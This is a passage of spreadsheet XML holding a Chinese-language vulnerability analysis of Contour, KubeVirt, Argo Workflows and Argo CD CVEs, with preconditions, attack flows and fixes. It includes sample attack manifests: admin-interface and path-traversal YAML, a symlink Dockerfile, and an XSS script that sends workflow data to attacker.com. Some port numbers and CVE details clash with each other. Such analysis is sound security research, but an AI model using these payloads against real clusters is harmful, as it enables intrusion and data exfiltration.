Contour是一款基于Envoy代理实现的Kubernetes入口控制器。在1.17.1之前的Contour版本中，攻击者可通过精心构造的ExternalName类型Service访问Envoy管理接口，而该接口通常被Contour限制在Envoy容器外不可访问。此漏洞可被用于远程关闭Envoy（导致拒绝服务攻击），或暴露Envoy配置中使用的任何Secret的存在（包括最关键的TLS密钥对），但*无法*获取这些Secret的实际内容。由于该漏洞允许访问管理接口，攻击者可实施多种管理操作，例如关闭Envoy实例或执行流量排空。通常情况下，Envoy管理接口难以用于更改集群配置、飞行中请求或后端服务，但如上所述，可被用于关闭/排空Envoy实例、更改流量路由或获取密钥元数据。该问题将在Contour v1.18.0版本中修复，同时已发布精选补丁版本v1.17.1以支持当前无法升级的用户。更多详细信息请参阅相关GitHub安全公告链接。</t>
  </si>
  <si>
    <t>**攻击面/影响范围**：  
   - 使用Contour且允许创建`ExternalName` Service的集群。  
   - 攻击者需具备`Service`资源的创建/修改权限（PR:L）。</t>
  </si>
  <si>
    <t>**利用方式与攻击过程**：  
   - 攻击者创建恶意`ExternalName` Service，关联到Ingress路由规则。  
   - 通过该Service访问Envoy的admin接口（如`/stats`或`/server_info`），执行关闭Envoy实例或泄露Secret元数据。</t>
  </si>
  <si>
    <t>apiVersion: v1
     kind: Service
     metadata:
       name: malicious-externalname
     spec:
       type: ExternalName
       externalName: 127.0.0.1   # 关键注入点，指向Envoy admin接口的本地地址
       ports:
       - port: 9001              # Envoy默认admin接口端口
         targetPort: 9001</t>
  </si>
  <si>
    <t>典型的配置字段注入漏洞,通过注入特制的ExternalName配置值,绕过了访问控制获取管理接口访问权限。
-&gt; 特定的类型的service 的特定字段是需要进行校验的（跨应用场景迁移？）</t>
  </si>
  <si>
    <t xml:space="preserve">Contour is a Kubernetes ingress controller using Envoy proxy. In Contour before version 1.17.1 a specially crafted ExternalName type Service may be used to access Envoy's admin interface, which Contour normally prevents from access outside the Envoy container. This can be used to shut down Envoy remotely (a denial of service), or to expose the existence of any Secret that Envoy is using for its configuration, including most notably TLS Keypairs. However, it *cannot* be used to get the *content* of those secrets. Since this attack allows access to the administration interface, a variety of administration options are available, such as shutting down the Envoy or draining traffic. In general, the Envoy admin interface cannot easily be used for making changes to the cluster, in-flight requests, or backend services, but it could be used to shut down or drain Envoy, change traffic routing, or to retrieve secret metadata, as mentioned above. The issue will be addressed in Contour v1.18.0 and a cherry-picked patch release, v1.17.1, has been released to cover users who cannot upgrade at this time. For more details refer to the linked GitHub Security Advisory.
ExternalName Service的解析不严格
</t>
  </si>
  <si>
    <t>ExternalName为内部地址
-&gt; Contour解析ExternalName
-&gt; 访问该地址对应的Envoy Admin Interface(默认:http://127.0.0.1:9901)
资源的不正确配置导致暴露内部组件的高权限的API
Service ExternalName 
-&gt; Contour处理解析
-&gt; Envoy配置生成
-&gt; 绕过访问控制
-&gt; 访问Envoy Admin接口
可能的影响：
访问Admin接口
├── DoS攻击
│   ├── 关闭Envoy
│   └── 排空流量(drain)
├── 信息泄露
│   └── 暴露Secret元信息
└── 流量控制
    └── 修改路由规则</t>
  </si>
  <si>
    <t>信任边界变化-内部到外部</t>
  </si>
  <si>
    <t>写service 资源-&gt; 生成网络配置 
影响网络策略配置
涉及基础资源操作</t>
  </si>
  <si>
    <t>CVE-2022-1798</t>
  </si>
  <si>
    <t xml:space="preserve">
KubeVirt所有平台版本至0.56（含0.55.1）存在路径遍历漏洞，允许能够配置kubevirt的用户读取宿主机文件系统中任意公开可读或对UID 107/GID 107可读的文件，/proc/self/&lt;&gt;路径不可访问。</t>
  </si>
  <si>
    <t>**攻击面**：  
   - 具有`CREATE/UPDATE`权限的KubeVirt用户  
   - 宿主机上UID/GID 107可读的文件（通常为`qemu`用户权限）</t>
  </si>
  <si>
    <t>**利用方式**：  
   - 攻击者创建包含恶意`hostDisk`路径的VM配置  
   - 通过挂载路径访问宿主机敏感文件（如`/etc/shadow`, Kubernetes证书）</t>
  </si>
  <si>
    <t xml:space="preserve"> VirtualMachineInstance.
# 三个主要的漏洞字段：
- spec.domain.firmware.kernelBoot.container.kernelPath
- spec.domain.firmware.kernelBoot.container.initrdPath
- spec.volumes[*].containerDisk.path
示例：
通过VMI规范注入相对路径：
yamlCopyapiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
spec:
  volumes:
  - containerDisk:
      image: quay.io/kubevirt/cirros-container-disk-demo:v0.52.0
      path: test3/../../../../../../../../etc/passwd  # 路径遍历</t>
  </si>
  <si>
    <t>apiVersion: kubevirt.io/v1
   kind: VirtualMachineInstance
   spec:
     volumes:
     - name: host-disk
       hostDisk:
         path: /etc/kubernetes/pki/../../etc/passwd  # 恶意路径遍历
         type: FileOrCreate
     containers:
     - volumeMounts:
       - name: host-disk
         mountPath: /mnt/host</t>
  </si>
  <si>
    <t>A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/&lt;&gt; is not accessible.
---
提出了3个attack vector</t>
  </si>
  <si>
    <t xml:space="preserve">Patched versions
0.55.1
https://github.com/kubevirt/kubevirt/pull/8198
https://github.com/kubevirt/kubevirt/pull/8268
</t>
  </si>
  <si>
    <t>https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364
google research:
https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm</t>
  </si>
  <si>
    <t>权限前提：
yamlCopy# 需要具备的权限：
- 创建/修改VMI的权限
- 创建/上传容器镜像的权限
- 使用containerDisk的权限
环境前提：
yamlCopy# 需要满足：
- 运行有漏洞版本的KubeVirt（&lt; 0.55.1）
- 目标集群支持VMI功能
- 未禁用containerDisk功能
配置前提：
yamlCopy# 以下任一条件：
- HotplugVolumes特性门控已启用（用于PVC热插拔攻击）
- 允许使用containerDisk
- 未严格限制spec.domain.firmware.kernelBoot配置
安全机制：
yamlCopy# 可能影响利用的因素：
- SELinux是否启用（启用会部分阻止文件读取）
- 是否有策略控制器限制VMI配置
- 是否有额外的安全机制
3个攻击向量的详细利用条件：
# 三种攻击向量的具体前提：
1. 相对路径注入：
- 能够创建VMI
- 可以指定volumes配置
2. 恶意容器镜像：
- 能够构建和推送镜像
- 集群可以拉取该镜像
- 可以在VMI中使用自定义镜像
3. PVC热插拔：
- HotplugVolumes功能已启用
- 有权限创建和管理PVC</t>
  </si>
  <si>
    <t>挂载目录，目录遍历-》 越权
- 可读取主机任意文件
- 影响virt-launcher pod
- 可能导致敏感信息泄露
涉及3个攻击向量：
a. 通过VMI规范注入相对路径：
yamlCopyapiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
spec:
  volumes:
  - containerDisk:
      image: quay.io/kubevirt/cirros-container-disk-demo:v0.52.0
      path: test3/../../../../../../../../etc/passwd  # 路径遍历
b. 通过恶意容器镜像：
dockerfileCopyFROM anybase
RUN mkdir -p /etc/ &amp;&amp; touch /etc/passwd
RUN mkdir -p /disks/ &amp;&amp; ln -s /etc/passwd /disks/disk.img
c. 通过PVC热插拔：
利用用户控制的PVC
放置绝对路径符号链接</t>
  </si>
  <si>
    <t>复杂来源</t>
  </si>
  <si>
    <t xml:space="preserve">增加check
更改sink点：
使用更安全的api
1. 核心修复措施 - 引入safepath包：
主要特点：
- 引入 safepath.Path 和 safepath.File 类型
- 不跟随符号链接
- 保持初始根上下文
- 基于unix.*At()文件函数构建抽象
2.具体修复点
a. 路径处理安全性：
- virt-chroot: 使用解析后的真实路径进行挂载操作
- containerdisks: 完全使用安全路径操作
- 隔离检测器: 提供safepath.Path而不是简单字符串路径
b. API限制：
- virt-api: 不再接受相对路径
- host-disks: 不再自动重新标记selinux标签
c. 安全路径创建方式：
- safepath.JoinWithRelativeRoot(): 从任意路径创建实际路径
- safepath.NewFile(): 从给定的真实和已解析路径创建路径对象
</t>
  </si>
  <si>
    <t xml:space="preserve">
kubevirt 0.29 及更早版本中存在安全缺陷。攻击者可利用虚拟机实例（VMI）获取宿主机文件系统的访问权限。成功利用此漏洞的攻击者可获取宿主系统上虚拟机进程的权限，最严重情况下攻击者可读取并修改运行该VMI的系统上的任意文件。此漏洞最高级别的威胁在于可能破坏数据机密性、完整性以及系统可用性。</t>
  </si>
  <si>
    <t>**攻击面/影响范围**：  
   - 所有使用KubeVirt且版本≤0.29的Kubernetes集群  
   - 具备创建/修改`VirtualMachineInstance`权限的用户或服务账户</t>
  </si>
  <si>
    <t>**利用方式与攻击过程**：  
   - 攻击者创建包含`hostDisk`挂载的VMI配置  
   - 通过挂载宿主机目录读取/修改敏感文件（如`/etc/kubernetes/pki`）  
   - 利用VM进程权限（通常为特权容器）执行宿主机命令</t>
  </si>
  <si>
    <t xml:space="preserve"> VirtualMachineInstance
# VirtualMachineInstance资源中的注入点：
spec:
  volumes:
  - hostDisk:          # 主机磁盘卷配置
      path: ""         # 主机路径字段 - 攻击注入点
攻击配置文件示例：
apiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
metadata:
  name: vmi-hostdisk
spec:
  volumes:
  - name: hostdisk-volume
    hostDisk:
      path: "/etc/passwd"     # 访问主机敏感文件
      type: DiskOrCreate      # 磁盘类型
  domain:
    devices:
      disks:
      - name: hostdisk-volume
        disk:
          bus: virtio</t>
  </si>
  <si>
    <t>apiVersion: kubevirt.io/v1alpha3
     kind: VirtualMachineInstance
     metadata:
       name: malicious-vmi
     spec:
       domain:
         devices:
           disks:
           - name: host-root
             hostDisk:
               path: /
               type: DirectoryOrCreate  # 恶意挂载宿主机根目录</t>
  </si>
  <si>
    <t>权限前提：
yamlCopy# 需要具备的权限：
- 创建/修改VMI的权限
- 使用hostDisk卷的权限
- 对目标主机路径的访问权限
环境前提：
yamlCopy# 需要满足：
- 运行有漏洞版本的KubeVirt（0.29及更早）
- 启用了HostDisk特性门控
- VMI可以在目标节点上运行
配置前提：
yamlCopy# 系统配置：
- 允许使用hostDisk类型的卷
- 未限制VMI的卷配置
- 主机路径可访问</t>
  </si>
  <si>
    <t>未考虑所有的攻击场景</t>
  </si>
  <si>
    <t xml:space="preserve">
Argo Workflows 是一款基于容器的开源工作流引擎，用于在 Kubernetes 上编排并行作业。在受影响版本中，攻击者可创建一个生成 HTML 工件的工作流，该工件包含的 HTML 文件载有利用 XHR 请求与 Argo Server API 交互的脚本。攻击者将指向该工件的深层链接通过邮件发送给受害者，当受害者打开链接时脚本即开始执行。由于该脚本具有与受害者同等的 Argo Server API 访问权限，可读取受害者工作流信息或创建/删除工作流。需注意攻击者必须为内部人员：需与受害者处于同一集群且已具备运行自有工作流的权限，同时需掌握受害者系统的技术细节。目前尚未发现该漏洞在野利用迹象。我们强烈建议所有用户升级至修复版本。</t>
  </si>
  <si>
    <t>key`或其他存储后端路径配置）注入跨站脚本（XSS）。  
```yaml
apiVersion: argoproj.io/v1alpha1
kind: Workflow
spec:
  entrypoint: main
  templates:
  - name: main
    container:
      image: alpine
      command: ["sh", "-c", "echo '&lt;script&gt;恶意API调用代码&lt;/script&gt;' &gt; /tmp/attack.html"]
    outputs:
      artifacts:
      - name: malicious-html
        path: /tmp/attack.html  # 注入恶意HTML文件路径
        s3:
          key: attack.html      # 存储路径可控字段
```</t>
  </si>
  <si>
    <t>**攻击者可能的利用方式和攻击过程**  
- 攻击者创建包含恶意HTML的工作流，生成指向该artifact的深链接  
- 通过钓鱼邮件诱导受害者点击链接，浏览器执行脚本  
- 脚本利用受害者已认证的Argo Server会话发起API请求（如列出/删除工作流）</t>
  </si>
  <si>
    <t>在这个漏洞中，攻击者通过工作流的制品（Artifacts）字段进行注入。
具体示例：
apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
  name: malicious-artifact-workflow
spec:
  templates:
  - name: xss-template
    container:
      image: nginx
      command: [bash, -c]
      args:
        - |
          cat &lt;&lt;EOF &gt; /tmp/malicious.html
          &lt;html&gt;
            &lt;script&gt;
              // 恶意脚本，使用 XHR 调用 Argo Server API
              fetch('/api/v1/workflows/')
                .then(response =&gt; response.json())
                .then(data =&gt; {
                  // 发送数据到攻击者服务器
                  fetch('https://attacker.com/collect', {
                    method: 'POST',
                    body: JSON.stringify(data)
                  });
                });
            &lt;/script&gt;
          &lt;/html&gt;
          EOF
    outputs:
      artifacts:
      - name: malicious-html
        path: /tmp/malicious.html    # 注入点：制品路径
        archive:
          none: {}                   # 使用无压缩格式以确保 HTML 可直接执行
----
outputs:
  artifacts:
  - name: malicious-html     # 制品名称可以是任意值
    path: /tmp/malicious.html    # 注入点：指向包含恶意 HTML 的路径
    archive:
      none: {}               # 确保内容不被压缩，可直接执行</t>
  </si>
  <si>
    <t>apiVersion: argoproj.io/v1alpha1
kind: Workflow
spec:
  entrypoint: main
  templates:
  - name: main
    container:
      image: alpine
      command: ["sh", "-c", "echo '&lt;script&gt;恶意API调用代码&lt;/script&gt;' &gt; /tmp/attack.html"]
    outputs:
      artifacts:
      - name: malicious-html
        path: /tmp/attack.html  # 注入恶意HTML文件路径
        s3:
          key: attack.html      # 存储路径可控字段</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Argo Workflows 中的 </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>存储型 XSS（跨站脚本）与 CSRF（跨站请求伪造）的组合利用漏洞，允许已授权的内部攻击者通过诱导受害者访问恶意构造的 HTML 工件，间接利用受害者的会话权限操作 Argo Server API，进而实施越权攻击。
漏洞根本原因： Argo Workflows 未对 HTML 工件实施内容安全策略（CSP），允许内联脚本执行。
其他攻击方式：
非可执行类型（文本、Markdown）</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 仅可用于钓鱼攻击，需依赖用户交互。
</t>
    </r>
  </si>
  <si>
    <t>The attacker creates a workflow that produces a HTML artifact that contains a HTML file that contains a script which uses XHR calls to interact with the Argo Server API.
The attacker emails the deep-link to the artifact to their victim. The victim opens the link, the script starts running.</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>步骤 1：创建恶意工作流
- 攻击者创建生成 HTML 制品的工作流（workflow)
- HTML 包含恶意脚本-&gt; HTML 文件中嵌入 JavaScript，通过 XMLHttpRequest (XHR) 调用 Argo Server API（如列举/创建/删除 Workflow）。
（脚本使用 XHR 调用 Argo Server API）
步骤 2：社会工程学攻击
- 攻击者向受害者发送制品的深度链接
- 受害者打开链接
- 恶意脚本开始执行
攻击者通过邮件或消息发送深链接（Deep Link）</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">，指向托管在 Argo 工件存储（如 S3/MinIO）中的恶意 HTML。
示例： https://argo-server/artifacts/&lt;namespace&gt;/&lt;workflow-name&gt;/malicious.html
步骤 3：利用受害者权限
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">信息泄露：列举命名空间内的 Workflow 及其敏感数据（如镜像、环境变量）。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">资源操控：创建/删除 Workflow，注入恶意容器或横向移动载荷。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>权限提升：若受害者具备集群管理权限，攻击者可间接接管集群
攻击者生成恶意 HTML 工件 → 受害者访问该工件的 URL → 浏览器解析并执行内联脚本。</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">组件间交互 1：生成与存储恶意工件
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Workflow Controller → Artifact 存储服务
攻击者通过 Argo Workflow 生成恶意 HTML 文件，存储至 S3 等外部存储服务。
漏洞条件：Workflow Controller 未对 HTML 文件内容进行安全审查（如 CSP 策略）。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">组件间交互 2：用户访问恶意链接
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">用户浏览器 → Argo Server
用户通过 Argo Server 的 URL（如 /artifacts/...）请求恶意 HTML 文件。
漏洞条件：Argo Server 未正确设置 HTTP 安全头（如 Content-Security-Policy）。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">组件间交互 3：脚本调用 API
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">用户浏览器 → Argo Server API
恶意脚本在用户浏览器中执行，携带受害者会话 Cookie 直接调用 Argo Server API（如 GET /api/v1/workflows）。
漏洞条件：API 未校验请求来源（CSRF Token 缺失），完全依赖会话 Cookie 鉴权。
argo-server -&gt; artiface server ( api路径对应相应的handler 函数）
</t>
    </r>
  </si>
  <si>
    <t>CVE-2022-31036</t>
  </si>
  <si>
    <t xml:space="preserve">
Argo CD是一款基于声明式GitOps的Kubernetes持续交付工具。从v1.3.0版本开始的所有Argo CD版本均存在符号链接跟随漏洞，允许具有仓库写入权限的恶意用户从Argo CD的repo-server泄露敏感YAML文件。具有Helm型Application所用（或可能使用）仓库写入权限的恶意Argo CD用户可提交指向越界文件的符号链接。若目标文件为有效YAML文件，攻击者即可读取该文件内容。可能泄露的敏感文件包括：其他Application源仓库的清单文件（如果您使用了解密插件，则可能包含已解密的文件）、或以YAML格式编写并作为文件挂载到repo-server上的任何密钥。该漏洞的补丁已在以下Argo CD版本发布：v2.4.1、v2.3.5、v2.2.10及v2.1.16。若您使用的版本&gt;=v2.3.0且未部署任何Helm型Application，可通过禁用Helm配置管理工具作为临时缓解措施。</t>
  </si>
  <si>
    <t>**攻击面及影响范围**  
   - 使用Argo CD且启用Helm作为配置管理工具的环境  
   - 攻击者需具备仓库写入权限  
   - 可泄露其他应用的源仓库文件（含解密内容）或挂载到repo-server的Secrets（YAML格式）。</t>
  </si>
  <si>
    <t>**攻击方式及过程**  
   - 攻击者提交包含符号链接的Helm Chart到仓库（如`charts/lnk -&gt; /etc/secrets/token.yaml`）  
   - Argo CD repo-server渲染Helm应用时解析符号链接，读取目标文件  
   - 若目标文件是YAML格式，内容通过Argo CD API或日志泄露。</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">1. 恶意 Helm Chart 结构
假设攻击者在 Git 仓库中提交如下结构的 Helm Chart：
bash
# 仓库目录结构
malicious-chart/
├── Chart.yaml          # Helm Chart 元数据
└── values.yaml -&gt; /etc/passwd  # 符号链接指向敏感文件
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Chart.yaml
yaml
apiVersion: v2
name: malicious-chart
description: A Helm chart to exploit path traversal
type: application
version: 0.1.0
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>values.yaml（符号链接）</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
bash
# 在本地创建符号链接（需提交到 Git 仓库）
ln -s /etc/passwd malicious-chart/values.yaml
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>2. Argo CD Application 资源配置
攻击者通过以下 Application 资源触发漏洞：
yaml
apiVersion: argoproj.io/v1alpha1
kind: Application
metadata:
  name: vulnerable-helm-app
  namespace: argocd
spec:
  project: default
  source:
    repoURL: https://github.com/attacker/malicious-repo.git  # 恶意仓库地址
    path: malicious-chart                                   # 指向恶意 Chart 的路径
    targetRevision: HEAD                                    # 使用最新提交
    helm:
      valueFiles:
        - values.yaml  # 显式指定加载 values.yaml（符号链接）
  destination:
    server: https://kubernetes.default.svc
    namespace: default
具体攻击流程示例分析：
结合repo-server的单体文件结构特征（所有应用的源码统一存储在类似/tmp/repo的目录下），攻击者可通过以下步骤完成攻击16：
提交包含恶意路径的Helm Chart（如values.yaml: /var/run/secrets/kubernetes.io/serviceaccount/token）。
利用url.ParseRequestURI()的误判，使该路径被标记为"合法URI"。
绕过EnforceToCurrentRoot()校验，直接读取目标敏感文件。
通过Argo CD API或UI泄露文件内容。</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">All unpatched versions of Argo CD starting with v1.3.0 are vulnerable to a symlink following bug allowing a malicious user with repository write access to leak sensitive YAML files from Argo CD's repo-server.
A malicious Argo CD user with write access for a repository which is (or may be) used in a Helm-type Application may commit a symlink which points to an out-of-bounds file. If the target file is a valid YAML file, the attacker can read the contents of that file.
Sensitive files which could be leaked include manifest files from other Applications' source repositories (potentially decrypted files, if you are using a decryption plugin) or any YAML-formatted secrets which have been mounted as files on the repo-server.
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>CVE-2022-31054 漏洞利用前提分析
该漏洞允许拥有仓库写入权限的攻击者通过符号链接（Symlink）读取 Argo CD repo-server 组件上的敏感 YAML 文件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">1. Argo CD 版本未修复且存在漏洞
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">影响版本：所有从 v1.3.0 开始且未升级到修复版本（如 v2.4.5+、v2.3.10+）的 Argo CD 实例。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">修复方案：通过升级或应用补丁禁用符号链接解析。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">2. 攻击者拥有目标仓库的写入权限
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">权限要求：攻击者需能向 Argo CD 使用的 Git 仓库提交代码（如通过 Git 推送权限或协作仓库的 PR/MR 权限）。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">攻击入口：
直接写入主分支。
提交到可能被合并的分支（若仓库配置为自动同步未审核的分支）。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">3. 目标仓库被用于 Helm 类型应用
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Helm 类型应用的特性：
Helm Chart 允许通过 dependencies 或 subcharts 引用外部资源，而 Argo CD 在处理 Helm 应用时未严格限制符号链接路径解析。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">漏洞触发点：
当 repo-server 处理 Helm Chart 时，若 Chart 中包含恶意符号链接，且指向 repo-server 本地的敏感文件，则会被解析并返回给攻击者。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">4. 符号链接指向敏感文件且符合条件
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">敏感文件路径要求：
文件需位于 repo-server Pod 的文件系统中（如其他应用的源码目录、挂载的 Secret/ConfigMap 文件）。
文件必须为 </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>有效的 YAML 格式</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">（否则会被解析失败丢弃）。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">典型敏感文件示例：
其他应用的 deployment.yaml 或 secret.yaml（尤其是使用解密插件后的明文文件）。
挂载到 repo-server 的 Kubernetes Secret（如 spec.sources.helm.valuesFrom.secretKeyRef 引用的文件）。
系统敏感文件（如 /etc/kubernetes/admin.conf，若挂载到容器内）。
</t>
    </r>
    <r>
      <rPr>
